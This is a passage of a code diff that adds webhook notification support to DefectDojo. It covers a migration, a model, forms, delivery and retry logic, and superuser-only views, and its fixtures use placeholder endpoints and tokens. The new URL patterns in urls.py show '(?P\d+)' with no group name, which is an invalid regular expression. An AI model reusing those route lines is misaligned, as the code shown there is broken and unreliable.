waits for response from webhook endpoint'), + ), + migrations.AlterField( + model_name='notifications', + name='auto_close_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='close_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='code_review', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='engagement_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='jira_update', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='JIRA sync happens in the background, errors will be shown as notifications/alerts so make sure to subscribe', max_length=33, verbose_name='JIRA problems'), + ), + migrations.AlterField( + model_name='notifications', + name='other', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='product_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='product_type_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='review_requested', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='risk_acceptance_expiration', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) Risk Acceptance expiries', max_length=33, verbose_name='Risk Acceptance Expiration'), + ), + migrations.AlterField( + model_name='notifications', + name='scan_added', + 
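+            # The new 'webhooks' value joins the existing channels in every field of
+            # this migration; MultiSelectField stores the selection as a comma-joined
+            # string, so max_length grows to 33, the length of
+            # "slack,msteams,mail,webhooks,alert".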
field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Triggered whenever an (re-)import has been done that created/updated/closed findings.', max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='scan_added_empty', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=[], help_text='Triggered whenever an (re-)import has been done (even if that created/updated/closed no findings).', max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='sla_breach', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) SLA breaches', max_length=33, verbose_name='SLA breach'), + ), + migrations.AlterField( + model_name='notifications', + name='sla_breach_combined', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) SLA breaches (a message per project)', max_length=33, verbose_name='SLA breach (combined)'), + ), + migrations.AlterField( + model_name='notifications', + name='stale_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='test_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='upcoming_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='user_mentioned', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.CreateModel( + name='Notification_Webhooks', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('name', models.CharField(default='', help_text='Name of the incoming webhook', max_length=100, unique=True)), + ('url', models.URLField(default='', help_text='The full URL of the incoming webhook')), + ('header_name', models.CharField(blank=True, default='', help_text='Name of the header required for interacting with Webhook endpoint', max_length=100, null=True)), + ('header_value', models.CharField(blank=True, default='', help_text='Content of the header required for interacting with Webhook endpoint', max_length=100, null=True)), + ('status', 
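+                # 'status' is machine-managed (editable=False): the delivery and retry
+                # logic in dojo/notifications/helper.py flips it; users only change it
+                # through the activate/deactivate actions in the UI.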
models.CharField(choices=[('active', 'Active'), ('active_tmp', 'Active but 5xx (or similar) error detected'), ('inactive_tmp', 'Temporary inactive because of 5xx (or similar) error'), ('inactive_permanent', 'Permanently inactive')], default='active', editable=False, help_text='Status of the incoming webhook', max_length=20)), + ('first_error', models.DateTimeField(blank=True, editable=False, help_text='If endpoint is active, when error happened first time', null=True)), + ('last_error', models.DateTimeField(blank=True, editable=False, help_text='If endpoint is active, when error happened last time', null=True)), + ('note', models.CharField(blank=True, default='', editable=False, help_text='Description of the latest error', max_length=1000, null=True)), + ('owner', models.ForeignKey(blank=True, help_text='Owner/receiver of notification, if empty processed as system notification', null=True, on_delete=django.db.models.deletion.CASCADE, to='dojo.dojo_user')), + ], + ), + ] diff --git a/dojo/engagement/signals.py b/dojo/engagement/signals.py index c2f09c9abbd..7b95d6fe87b 100644 --- a/dojo/engagement/signals.py +++ b/dojo/engagement/signals.py @@ -16,7 +16,7 @@ def engagement_post_save(sender, instance, created, **kwargs): if created: title = _('Engagement created for "%(product)s": %(name)s') % {"product": instance.product, "name": instance.name} create_notification(event="engagement_added", title=title, engagement=instance, product=instance.product, - url=reverse("view_engagement", args=(instance.id,))) + url=reverse("view_engagement", args=(instance.id,)), url_api=reverse("engagement-detail", args=(instance.id,))) @receiver(pre_save, sender=Engagement) diff --git a/dojo/fixtures/dojo_testdata.json b/dojo/fixtures/dojo_testdata.json index 62486cb90cf..ae550f8bf81 100644 --- a/dojo/fixtures/dojo_testdata.json +++ b/dojo/fixtures/dojo_testdata.json @@ -227,6 +227,7 @@ "url_prefix": "", "enable_slack_notifications": false, "enable_mail_notifications": false, + "enable_webhooks_notifications": true, "email_from": "no-reply@example.com", "false_positive_history": false, "msteams_url": "", @@ -2926,11 +2927,27 @@ "pk": 1, "model": "dojo.notifications", "fields": { - "product": 1, - "user": 2, - "product_type_added": [ - "slack" - ] + "product": null, + "user": null, + "template": false, + "product_type_added": "webhooks,alert", + "product_added": "webhooks,alert", + "engagement_added": "webhooks,alert", + "test_added": "webhooks,alert", + "scan_added": "webhooks,alert", + "scan_added_empty": "webhooks", + "jira_update": "alert", + "upcoming_engagement": "alert", + "stale_engagement": "alert", + "auto_close_engagement": "alert", + "close_engagement": "alert", + "user_mentioned": "alert", + "code_review": "alert", + "review_requested": "alert", + "other": "alert", + "sla_breach": "alert", + "risk_acceptance_expiration": "alert", + "sla_breach_combined": "alert" } }, { @@ -3045,5 +3062,35 @@ "dismissable": true, "style": "danger" } + }, + { + "model": "dojo.notification_webhooks", + "pk": 1, + "fields": { + "name": "My webhook endpoint", + "url": "http://webhook.endpoint:8080/post", + "header_name": "Auth", + "header_value": "Token xxx", + "status": "active", + "first_error": null, + "last_error": null, + "note": null, + "owner": null + } + }, + { + "model": "dojo.notification_webhooks", + "pk": 2, + "fields": { + "name": "My personal webhook endpoint", + "url": "http://webhook.endpoint:8080/post", + "header_name": "Auth", + "header_value": "Token secret", + "status": "active", + "first_error": null, 
+ "last_error": null, + "note": null, + "owner": 2 + } } ] \ No newline at end of file diff --git a/dojo/forms.py b/dojo/forms.py index dde58a38b61..acf3546285b 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -72,6 +72,7 @@ JIRA_Project, Note_Type, Notes, + Notification_Webhooks, Notifications, Objects_Product, Product, @@ -2778,6 +2779,32 @@ class Meta: exclude = ["template"] +class NotificationsWebhookForm(forms.ModelForm): + class Meta: + model = Notification_Webhooks + exclude = [] + + def __init__(self, *args, **kwargs): + is_superuser = kwargs.pop("is_superuser", False) + super().__init__(*args, **kwargs) + if not is_superuser: # Only superadmins can edit owner + self.fields["owner"].disabled = True # TODO: needs to be tested + + +class DeleteNotificationsWebhookForm(forms.ModelForm): + id = forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.fields["name"].disabled = True + self.fields["url"].disabled = True + + class Meta: + model = Notification_Webhooks + fields = ["id", "name", "url"] + + class ProductNotificationsForm(forms.ModelForm): def __init__(self, *args, **kwargs): diff --git a/dojo/models.py b/dojo/models.py index 5048f30427f..308db965228 100644 --- a/dojo/models.py +++ b/dojo/models.py @@ -353,6 +353,13 @@ class System_Settings(models.Model): mail_notifications_to = models.CharField(max_length=200, default="", blank=True) + enable_webhooks_notifications = \ + models.BooleanField(default=False, + verbose_name=_("Enable Webhook notifications"), + blank=False) + webhooks_notifications_timeout = models.IntegerField(default=10, + help_text=_("How many seconds will DefectDojo waits for response from webhook endpoint")) + false_positive_history = models.BooleanField( default=False, help_text=_( "(EXPERIMENTAL) DefectDojo will automatically mark the finding as a " @@ -4015,12 +4022,14 @@ def set_obj(self, obj): NOTIFICATION_CHOICE_SLACK = ("slack", "slack") NOTIFICATION_CHOICE_MSTEAMS = ("msteams", "msteams") NOTIFICATION_CHOICE_MAIL = ("mail", "mail") +NOTIFICATION_CHOICE_WEBHOOKS = ("webhooks", "webhooks") NOTIFICATION_CHOICE_ALERT = ("alert", "alert") NOTIFICATION_CHOICES = ( NOTIFICATION_CHOICE_SLACK, NOTIFICATION_CHOICE_MSTEAMS, NOTIFICATION_CHOICE_MAIL, + NOTIFICATION_CHOICE_WEBHOOKS, NOTIFICATION_CHOICE_ALERT, ) @@ -4109,6 +4118,33 @@ def get_list_display(self, request): return list_fields +class Notification_Webhooks(models.Model): + class Status(models.TextChoices): + __STATUS_ACTIVE = "active" + __STATUS_INACTIVE = "inactive" + STATUS_ACTIVE = f"{__STATUS_ACTIVE}", _("Active") + STATUS_ACTIVE_TMP = f"{__STATUS_ACTIVE}_tmp", _("Active but 5xx (or similar) error detected") + STATUS_INACTIVE_TMP = f"{__STATUS_INACTIVE}_tmp", _("Temporary inactive because of 5xx (or similar) error") + STATUS_INACTIVE_PERMANENT = f"{__STATUS_INACTIVE}_permanent", _("Permanently inactive") + + name = models.CharField(max_length=100, default="", blank=False, unique=True, + help_text=_("Name of the incoming webhook")) + url = models.URLField(max_length=200, default="", blank=False, + help_text=_("The full URL of the incoming webhook")) + header_name = models.CharField(max_length=100, default="", blank=True, null=True, + help_text=_("Name of the header required for interacting with Webhook endpoint")) + header_value = models.CharField(max_length=100, default="", blank=True, null=True, + help_text=_("Content of the header required for interacting with Webhook endpoint")) + status = 
models.CharField(max_length=20, choices=Status, default="active", blank=False, + help_text=_("Status of the incoming webhook"), editable=False) + first_error = models.DateTimeField(help_text=_("If endpoint is active, when error happened first time"), blank=True, null=True, editable=False) + last_error = models.DateTimeField(help_text=_("If endpoint is active, when error happened last time"), blank=True, null=True, editable=False) + note = models.CharField(max_length=1000, default="", blank=True, null=True, help_text=_("Description of the latest error"), editable=False) + owner = models.ForeignKey(Dojo_User, editable=True, null=True, blank=True, on_delete=models.CASCADE, + help_text=_("Owner/receiver of notification, if empty processed as system notification")) + # TODO: Test that `editable` will block editing via API + + class Tool_Product_Settings(models.Model): name = models.CharField(max_length=200, null=False) description = models.CharField(max_length=2000, null=True, blank=True) @@ -4581,6 +4617,7 @@ def __str__(self): auditlog.register(Risk_Acceptance) auditlog.register(Finding_Template) auditlog.register(Cred_User, exclude_fields=["password"]) + auditlog.register(Notification_Webhooks, exclude_fields=["header_name", "header_value"]) from dojo.utils import calculate_grade, to_str_typed # noqa: E402 # there is issue due to a circular import @@ -4642,6 +4679,7 @@ def __str__(self): admin.site.register(GITHUB_Details_Cache) admin.site.register(GITHUB_PKey) admin.site.register(Tool_Configuration, Tool_Configuration_Admin) +admin.site.register(Notification_Webhooks) admin.site.register(Tool_Product_Settings) admin.site.register(Tool_Type) admin.site.register(Cred_User) diff --git a/dojo/notifications/helper.py b/dojo/notifications/helper.py index 5a7ccf0dc60..9acbf94d215 100644 --- a/dojo/notifications/helper.py +++ b/dojo/notifications/helper.py @@ -1,6 +1,9 @@ +import json import logging +from datetime import timedelta import requests +import yaml from django.conf import settings from django.core.exceptions import FieldDoesNotExist from django.core.mail import EmailMessage @@ -10,10 +13,19 @@ from django.urls import reverse from django.utils.translation import gettext as _ +from dojo import __version__ as dd_version from dojo.authorization.roles_permissions import Permissions from dojo.celery import app from dojo.decorators import dojo_async_task, we_want_async -from dojo.models import Alerts, Dojo_User, Notifications, System_Settings, UserContactInfo +from dojo.models import ( + Alerts, + Dojo_User, + Notification_Webhooks, + Notifications, + System_Settings, + UserContactInfo, + get_current_datetime, +) from dojo.user.queries import get_authorized_users_for_product_and_product_type, get_authorized_users_for_product_type logger = logging.getLogger(__name__) @@ -144,8 +156,9 @@ def create_notification_message(event, user, notification_type, *args, **kwargs) try: notification_message = render_to_string(template, kwargs) logger.debug("Rendering from the template %s", template) - except TemplateDoesNotExist: - logger.debug("template not found or not implemented yet: %s", template) + except TemplateDoesNotExist as e: + # In some cases, template includes another templates, if the interior one is missing, we will see it in "specifically" section + logger.debug(f"template not found or not implemented yet: {template} (specifically: {e.args})") except Exception as e: logger.error("error during rendering of template %s exception is %s", template, e) finally: @@ -170,6 +183,7 @@ def 
process_notifications(event, notifications=None, **kwargs): slack_enabled = get_system_setting("enable_slack_notifications") msteams_enabled = get_system_setting("enable_msteams_notifications") mail_enabled = get_system_setting("enable_mail_notifications") + webhooks_enabled = get_system_setting("enable_webhooks_notifications") if slack_enabled and "slack" in getattr(notifications, event, getattr(notifications, "other")): logger.debug("Sending Slack Notification") @@ -183,6 +197,10 @@ def process_notifications(event, notifications=None, **kwargs): logger.debug("Sending Mail Notification") send_mail_notification(event, notifications.user, **kwargs) + if webhooks_enabled and "webhooks" in getattr(notifications, event, getattr(notifications, "other")): + logger.debug("Sending Webhooks Notification") + send_webhooks_notification(event, notifications.user, **kwargs) + if "alert" in getattr(notifications, event, getattr(notifications, "other")): logger.debug(f"Sending Alert to {notifications.user}") send_alert_notification(event, notifications.user, **kwargs) @@ -309,6 +327,157 @@ def send_mail_notification(event, user=None, *args, **kwargs): log_alert(e, "Email Notification", title=kwargs["title"], description=str(e), url=kwargs["url"]) +def webhooks_notification_request(endpoint, event, *args, **kwargs): + from dojo.utils import get_system_setting + + headers = { + "User-Agent": f"DefectDojo-{dd_version}", + "X-DefectDojo-Event": event, + "X-DefectDojo-Instance": settings.SITE_URL, + "Accept": "application/json", + } + if endpoint.header_name is not None: + headers[endpoint.header_name] = endpoint.header_value + yaml_data = create_notification_message(event, endpoint.owner, "webhooks", *args, **kwargs) + data = yaml.safe_load(yaml_data) + + timeout = get_system_setting("webhooks_notifications_timeout") + + res = requests.request( + method="POST", + url=endpoint.url, + headers=headers, + json=data, + timeout=timeout, + ) + return res + + +def test_webhooks_notification(endpoint): + res = webhooks_notification_request(endpoint, "ping", description="Test webhook notification") + res.raise_for_status() + # in "send_webhooks_notification", we are doing deeper analysis, why it failed + # for now, "raise_for_status" should be enough + + +@app.task(ignore_result=True) +def webhook_reactivation(endpoint_id: int, *args, **kwargs): + endpoint = Notification_Webhooks.objects.get(pk=endpoint_id) + + # User already changed status of endpoint + if endpoint.status != Notification_Webhooks.Status.STATUS_INACTIVE_TMP: + return + + endpoint.status = Notification_Webhooks.Status.STATUS_ACTIVE_TMP + endpoint.save() + logger.debug(f"Webhook endpoint '{endpoint.name}' reactivated to '{Notification_Webhooks.Status.STATUS_ACTIVE_TMP}'") + + +@app.task(ignore_result=True) +def webhook_status_cleanup(*args, **kwargs): + # If some endpoint was affected by some outage (5xx, 429, Timeout) but it was clean during last 24 hours, + # we consider this endpoint as healthy so need to reset it + endpoints = Notification_Webhooks.objects.filter( + status=Notification_Webhooks.Status.STATUS_ACTIVE_TMP, + last_error__lt=get_current_datetime() - timedelta(hours=24), + ) + for endpoint in endpoints: + endpoint.status = Notification_Webhooks.Status.STATUS_ACTIVE + endpoint.first_error = None + endpoint.last_error = None + endpoint.note = f"Reactivation from {Notification_Webhooks.Status.STATUS_ACTIVE_TMP}" + endpoint.save() + logger.debug(f"Webhook endpoint '{endpoint.name}' reactivated from 
'{Notification_Webhooks.Status.STATUS_ACTIVE_TMP}' to '{Notification_Webhooks.Status.STATUS_ACTIVE}'") + + # Reactivation of STATUS_INACTIVE_TMP endpoints. + # They should reactive automatically in 60s, however in case of some unexpected event (e.g. start of whole stack), + # endpoints should not be left in STATUS_INACTIVE_TMP state + broken_endpoints = Notification_Webhooks.objects.filter( + status=Notification_Webhooks.Status.STATUS_INACTIVE_TMP, + last_error__lt=get_current_datetime() - timedelta(minutes=5), + ) + for endpoint in broken_endpoints: + webhook_reactivation(endpoint_id=endpoint.pk) + + +@dojo_async_task +@app.task +def send_webhooks_notification(event, user=None, *args, **kwargs): + + ERROR_PERMANENT = "permanent" + ERROR_TEMPORARY = "temporary" + + endpoints = Notification_Webhooks.objects.filter(owner=user) + + if not endpoints: + if user: + logger.info(f"URLs for Webhooks not configured for user '{user}': skipping user notification") + else: + logger.info("URLs for Webhooks not configured: skipping system notification") + return + + for endpoint in endpoints: + + error = None + if endpoint.status not in [Notification_Webhooks.Status.STATUS_ACTIVE, Notification_Webhooks.Status.STATUS_ACTIVE_TMP]: + logger.info(f"URL for Webhook '{endpoint.name}' is not active: {endpoint.get_status_display()} ({endpoint.status})") + continue + + try: + logger.debug(f"Sending webhook message to endpoint '{endpoint.name}'") + res = webhooks_notification_request(endpoint, event, *args, **kwargs) + + if 200 <= res.status_code < 300: + logger.debug(f"Message sent to endpoint '{endpoint.name}' successfully.") + continue + + # HTTP request passed successfully but we still need to check status code + if 500 <= res.status_code < 600 or res.status_code == 429: + error = ERROR_TEMPORARY + else: + error = ERROR_PERMANENT + + endpoint.note = f"Response status code: {res.status_code}" + logger.error(f"Error when sending message to Webhooks '{endpoint.name}' (status: {res.status_code}): {res.text}") + + except requests.exceptions.Timeout as e: + error = ERROR_TEMPORARY + endpoint.note = f"Requests exception: {e}" + logger.error(f"Timeout when sending message to Webhook '{endpoint.name}'") + + except Exception as e: + error = ERROR_PERMANENT + endpoint.note = f"Exception: {e}"[:1000] + logger.exception(e) + log_alert(e, "Webhooks Notification") + + now = get_current_datetime() + + if error == ERROR_TEMPORARY: + + # If endpoint is unstable for more then one day, it needs to be deactivated + if endpoint.first_error is not None and (now - endpoint.first_error).total_seconds() > 60 * 60 * 24: + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT + + else: + # We need to monitor when outage started + if endpoint.status == Notification_Webhooks.Status.STATUS_ACTIVE: + endpoint.first_error = now + + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_TMP + + # In case of failure within one day, endpoint can be deactivated temporally only for one minute + webhook_reactivation.apply_async(kwargs={"endpoint_id": endpoint.pk}, countdown=60) + + # There is no reason to keep endpoint active if it is returning 4xx errors + else: + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT + endpoint.first_error = now + + endpoint.last_error = now + endpoint.save() + + def send_alert_notification(event, user=None, *args, **kwargs): logger.debug("sending alert notification to %s", user) try: @@ -335,7 +504,6 @@ def send_alert_notification(event, user=None, *args, **kwargs): 
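# The hunk below drops the function-local `import json`: the module-level
# import added at the top of this file in the first hunk now covers it.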
def get_slack_user_id(user_email): - import json from dojo.utils import get_system_setting @@ -390,7 +558,7 @@ def log_alert(e, notification_type=None, *args, **kwargs): def notify_test_created(test): title = "Test created for " + str(test.engagement.product) + ": " + str(test.engagement.name) + ": " + str(test) create_notification(event="test_added", title=title, test=test, engagement=test.engagement, product=test.engagement.product, - url=reverse("view_test", args=(test.id,))) + url=reverse("view_test", args=(test.id,)), url_api=reverse("test-detail", args=(test.id,))) def notify_scan_added(test, updated_count, new_findings=[], findings_mitigated=[], findings_reactivated=[], findings_untouched=[]): @@ -410,4 +578,4 @@ def notify_scan_added(test, updated_count, new_findings=[], findings_mitigated=[ create_notification(event=event, title=title, findings_new=new_findings, findings_mitigated=findings_mitigated, findings_reactivated=findings_reactivated, finding_count=updated_count, test=test, engagement=test.engagement, product=test.engagement.product, findings_untouched=findings_untouched, - url=reverse("view_test", args=(test.id,))) + url=reverse("view_test", args=(test.id,)), url_api=reverse("test-detail", args=(test.id,))) diff --git a/dojo/notifications/urls.py b/dojo/notifications/urls.py index dc91f7a04e2..6f4cba7bb64 100644 --- a/dojo/notifications/urls.py +++ b/dojo/notifications/urls.py @@ -7,4 +7,8 @@ re_path(r"^notifications/system$", views.SystemNotificationsView.as_view(), name="system_notifications"), re_path(r"^notifications/personal$", views.PersonalNotificationsView.as_view(), name="personal_notifications"), re_path(r"^notifications/template$", views.TemplateNotificationsView.as_view(), name="template_notifications"), + re_path(r"^notifications/webhooks$", views.ListNotificationWebhooksView.as_view(), name="notification_webhooks"), + re_path(r"^notifications/webhooks/add$", views.AddNotificationWebhooksView.as_view(), name="add_notification_webhook"), + re_path(r"^notifications/webhooks/(?P\d+)/edit$", views.EditNotificationWebhooksView.as_view(), name="edit_notification_webhook"), + re_path(r"^notifications/webhooks/(?P\d+)/delete$", views.DeleteNotificationWebhooksView.as_view(), name="delete_notification_webhook"), ] diff --git a/dojo/notifications/views.py b/dojo/notifications/views.py index 8a94d2ad7c5..6a2495330d7 100644 --- a/dojo/notifications/views.py +++ b/dojo/notifications/views.py @@ -1,15 +1,18 @@ import logging +import requests from django.contrib import messages from django.core.exceptions import PermissionDenied -from django.http import HttpRequest -from django.shortcuts import render +from django.http import Http404, HttpRequest, HttpResponseRedirect +from django.shortcuts import get_object_or_404, render +from django.urls import reverse from django.utils.translation import gettext as _ from django.views import View -from dojo.forms import NotificationsForm -from dojo.models import Notifications -from dojo.utils import add_breadcrumb, get_enabled_notifications_list +from dojo.forms import DeleteNotificationsWebhookForm, NotificationsForm, NotificationsWebhookForm +from dojo.models import Notification_Webhooks, Notifications +from dojo.notifications.helper import test_webhooks_notification +from dojo.utils import add_breadcrumb, get_enabled_notifications_list, get_system_setting logger = logging.getLogger(__name__) @@ -129,3 +132,295 @@ def get_scope(self): def set_breadcrumbs(self, request: HttpRequest): add_breadcrumb(title=_("Template notification 
settings"), top_level=False, request=request) return request + + +class NotificationWebhooksView(View): + + def check_webhooks_enabled(self): + if not get_system_setting("enable_webhooks_notifications"): + raise Http404 + + def check_user_permissions(self, request: HttpRequest): + if not request.user.is_superuser: + raise PermissionDenied + # TODO: finished access for other users + # if not user_has_configuration_permission(request.user, self.permission): + # raise PermissionDenied() + + def set_breadcrumbs(self, request: HttpRequest): + add_breadcrumb(title=self.breadcrumb, top_level=False, request=request) + return request + + def get_form( + self, + request: HttpRequest, + **kwargs: dict, + ) -> NotificationsWebhookForm: + if request.method == "POST": + return NotificationsWebhookForm(request.POST, is_superuser=request.user.is_superuser, **kwargs) + else: + return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) + + def preprocess_request(self, request: HttpRequest): + # Check Webhook notifications are enabled + self.check_webhooks_enabled() + # Check permissions + self.check_user_permissions(request) + + +class ListNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/view_notification_webhooks.html" + permission = "dojo.view_notification_webhooks" + breadcrumb = "Notification Webhook List" + + def get_initial_context(self, request: HttpRequest, nwhs: Notification_Webhooks): + return { + "name": "Notification Webhook List", + "metric": False, + "user": request.user, + "nwhs": nwhs, + } + + def get_notification_webhooks(self, request: HttpRequest): + nwhs = Notification_Webhooks.objects.all().order_by("name") + # TODO: finished pagination + # TODO: restrict based on user - not only superadmins have access and they see everything + return nwhs + + def get(self, request: HttpRequest): + # Run common checks + super().preprocess_request(request) + # Get Notification Webhooks + nwhs = self.get_notification_webhooks(request) + # Set up the initial context + context = self.get_initial_context(request, nwhs) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + +class AddNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/add_notification_webhook.html" + permission = "dojo.add_notification_webhooks" + breadcrumb = "Add Notification Webhook" + + # TODO: Disable Owner if not superadmin + + def get_initial_context(self, request: HttpRequest): + return { + "name": "Add Notification Webhook", + "user": request.user, + "form": self.get_form(request), + } + + def process_form(self, request: HttpRequest, context: dict): + form = context["form"] + if form.is_valid(): + try: + test_webhooks_notification(form.instance) + except requests.exceptions.RequestException as e: + messages.add_message( + request, + messages.ERROR, + _("Test of endpoint was not successful: %(error)s") % {"error": str(e)}, + extra_tags="alert-danger", + ) + return request, False + else: + # User can put here what ever he want + # we override it with our only valid defaults + nwh = form.save(commit=False) + nwh.status = Notification_Webhooks.Status.STATUS_ACTIVE + nwh.first_error = None + nwh.last_error = None + nwh.note = None + nwh.save() + messages.add_message( + request, + messages.SUCCESS, + _("Notification Webhook added successfully."), + extra_tags="alert-success", + ) + return request, True + return request, False + + def get(self, request: HttpRequest): + # Run common checks + 
+
+    def get(self, request: HttpRequest):
+        # Run common checks
+        super().preprocess_request(request)
+        # Set up the initial context
+        context = self.get_initial_context(request)
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
+
+    def post(self, request: HttpRequest):
+        # Run common checks
+        super().preprocess_request(request)
+        # Set up the initial context
+        context = self.get_initial_context(request)
+        # Determine the validity of the form
+        request, success = self.process_form(request, context)
+        if success:
+            return HttpResponseRedirect(reverse("notification_webhooks"))
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
+
+
+class EditNotificationWebhooksView(NotificationWebhooksView):
+    template = "dojo/edit_notification_webhook.html"
+    permission = "dojo.change_notification_webhooks"
+    # TODO: this could be better: @user_is_authorized(Finding, Permissions.Finding_Delete, 'fid')
+    breadcrumb = "Edit Notification Webhook"
+
+    def get_notification_webhook(self, nwhid: int):
+        return get_object_or_404(Notification_Webhooks, id=nwhid)
+
+    # TODO: Disable Owner if not superadmin
+
+    def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks):
+        return {
+            "name": "Edit Notification Webhook",
+            "user": request.user,
+            "form": self.get_form(request, instance=nwh),
+            "nwh": nwh,
+        }
+
+    def process_form(self, request: HttpRequest, nwh: Notification_Webhooks, context: dict):
+        form = context["form"]
+        if "deactivate_webhook" in request.POST:  # TODO: add this to the API as well
+            nwh.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT
+            nwh.first_error = None
+            nwh.last_error = None
+            nwh.note = "Deactivated from the UI"
+            nwh.save()
+            messages.add_message(
+                request,
+                messages.SUCCESS,
+                _("Notification Webhook deactivated successfully."),
+                extra_tags="alert-success",
+            )
+            return request, True
+
+        if form.is_valid():
+            try:
+                test_webhooks_notification(form.instance)
+            except requests.exceptions.RequestException as e:
+                messages.add_message(
+                    request,
+                    messages.ERROR,
+                    _("Test of endpoint was not successful: %(error)s") % {"error": str(e)},
+                    extra_tags="alert-danger")
+                return request, False
+            else:
+                # A correct definition resets the status fields to their defaults
+                nwh = form.save(commit=False)
+                nwh.status = Notification_Webhooks.Status.STATUS_ACTIVE
+                nwh.first_error = None
+                nwh.last_error = None
+                nwh.note = None
+                nwh.save()
+                messages.add_message(
+                    request,
+                    messages.SUCCESS,
+                    _("Notification Webhook updated successfully."),
+                    extra_tags="alert-success",
+                )
+                return request, True
+        return request, False
+
+    def get(self, request: HttpRequest, nwhid: int):
+        # Run common checks
+        super().preprocess_request(request)
+        nwh = self.get_notification_webhook(nwhid)
+        # Set up the initial context
+        context = self.get_initial_context(request, nwh)
+        # Add any breadcrumbs
+        request = self.set_breadcrumbs(request)
+        # Render the page
+        return render(request, self.template, context)
+
